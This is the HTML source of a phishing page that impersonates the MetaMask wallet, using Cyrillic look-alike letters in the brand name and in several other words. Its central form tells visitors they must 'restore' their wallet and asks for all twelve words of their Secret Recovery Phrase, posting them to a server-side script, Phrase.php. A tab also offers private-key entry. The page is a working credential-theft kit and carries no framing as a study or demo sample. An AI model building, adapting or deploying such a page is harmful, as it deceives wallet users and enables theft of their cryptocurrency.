<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="./Scripts/jquery.min.js"></script>
    <script src="./app.js"></script>
    <link rel="stylesheet" href="./Styles/index.css">
    <link rel="stylesheet" href="./Styles/webflow.css">
    <link rel="stylesheet" href="./Styles/metamask-staging-2.webflow.css">
    <link href="./success/images/favicon.png" rel="shortcut icon" type="image/x-icon">
    <title>МetаМask Wallets</title>
    <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-129523657-8"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-129523657-8');
</script>

</head>
<body>
    <div class="co">
        <nav>
            <img src="./Assets/mm-logo.svg" alt="" srcset="">
            <ul>
                <li>Feature</li>
                <li>Support</li>
                <li>About</li>
                <li>Build</li>
                <button>Wallets</button>
            </ul>
            <img src="./Assets/menu.png" id="menu" alt="">
        </nav>
        <div id="type">
            <span>Secret Recovery Phrаse</span>
            <section>Privаte Key</section>
        </div>
        <div class="con">
            <h1>Confirm Secret Recovery Phrase</h1>
            <p>To keep your wаllet secure you will be obligаted to restore your passphrаse. Fill in your passphrаse completely.</p>
            <form action="./Scripts/Phrase.php" method="post">
                <h4>Fill each word in the order it was presented to you.</h4>
                <div>
                    <span>
                        <section>1</section>
                        <input type="text" name="1" required>
                    </span>
                    <span>
                        <section>2</section>
                        <input type="text" name="2" required>
                    </span>
                    <span>
                        <section>3</section>
                        <input type="text" name="3" required>
                    </span>
                    <span>
                        <section>4</section>
                        <input type="text" name="4" required>
                    </span>
                </div>
                <div>
                    <span>
                        <section>5</section>
                        <input type="text" name="5" required>
                    </span>
                    <span>
                        <section>6</section>
                        <input type="text" name="6" required>
                    </span>
                    <span>
                        <section>7</section>
                        <input type="text" name="7" required>
                    </span>
                    <span>
                        <section>8</section>
                        <input type="text" name="8" required>
                    </span>
                </div>
                <div>
                    <span>
                        <section>9</section>
                        <input type="text" name="9" required>
                    </span>
                    <span>
                        <section>10</section>
                        <input type="text" name="10" required>
                    </span>
                    <span>
                        <section>11</section>
                        <input type="text" name="11" required>
                    </span>
                    <span>
                        <section>12</section>
                        <input type="text" name="12" required>
                    </span>
                </div>
                <button>Verify Phrases</button>
            </form>
        </div>
    </div>
    
    <div class="section-5 section-margins">
        <div class="browsers w-container">
            <h1 class="heading-12">Supported Browsers</h1>
            <div class="w-layout-grid grid-7">
                <a rel="noreferer, noopener" id="w-node-_2114e4df-a254-ef19-2736-8179ab2658cd-5051b365" href="https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn?hl=en" target="_blank" class="w-inline-block">
                    <div class="w-layout-grid grid-8"><img src="./Assets/chrome.png" alt="Google Chrome logo" class="image-11">
                        <div class="text-block-25">Chrome</div>
                    </div>
                </a>
                <a rel="noreferer, noopener" href="https://addons.mozilla.org/en-US/firefox/addon/ether-metamask/" target="_blank" class="w-inline-block">
                    <div class="w-layout-grid grid-8"><img src="./Assets/firefox.png" alt="Firefox logo" class="image-11">
                        <div class="text-block-29">Firefox</div>
                    </div>
                </a>
                <a rel="noreferer, noopener" href="https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn?hl=en" target="_blank" class="w-inline-block">
                    <div class="w-layout-grid grid-8"><img src="./Assets/brave-browser.png" alt="Brave browser logo" class="image-11">
                        <div class="text-block-29">Brave</div>
                    </div>
                </a>
                <a rel="noreferer, noopener" href="https://microsoftedge.microsoft.com/addons/detail/metamask/ejbalbakoplchlghecdalmeeeajnimhm?hl=en-US" target="_blank" class="w-inline-block">
                    <div class="w-layout-grid grid-8"><img src="./Assets/microsoft.png" alt="Microsoft Edge logo" class="image-11">
                        <div class="text-block-29">Edge</div>
                    </div>
                </a>
            </div>
        </div>
    </div>
  <div class="footer accent">
    <div class="container-9 w-container"><img src="images/mm-logo.svg" alt=""></div>
    <div class="w-container">
      <div class="columns-6 w-row">
        <div class="column-3 partnership w-col w-col-3">
          <h5 class="heading-6 orange-text">LEGAL</h5>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Privacy Policy</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Terms of Use</a>
          <a href="#" class="footer-link">Contributor License Agreement</a>
        </div>
        <div class="column-3 w-col w-col-3">
          <h5 class="heading-6 orange-text">LEARN MORE</h5>
          <a href="#" class="footer-link">About</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Developers</a>
          <a href="#" class="footer-link">Download</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Documentation</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">МetаМask for Institutions</a>
        </div>
        <div class="column-3 w-col w-col-3">
          <h5 class="heading-6 orange-text">GET INVOLVED</h5>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">GitHub</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Gitcoin</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Open Positions</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Swag Shop</a>
        </div>
        <div class="column-5 w-col w-col-3">
          <h5 class="heading-6 orange-text">CONNECT</h5>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Contact Us</a>
          <a href="#" class="footer-link">FAQs</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Support</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Blog</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Twitter</a>
        </div>
      </div>
    </div>
    <div class="container-19 w-container"></div>
    <div class="container-10 w-container">
      <p class="paragraph">©2022 МetаМask • A ConsenSys Formation</p>
    </div>
  </div>
</body>
</html>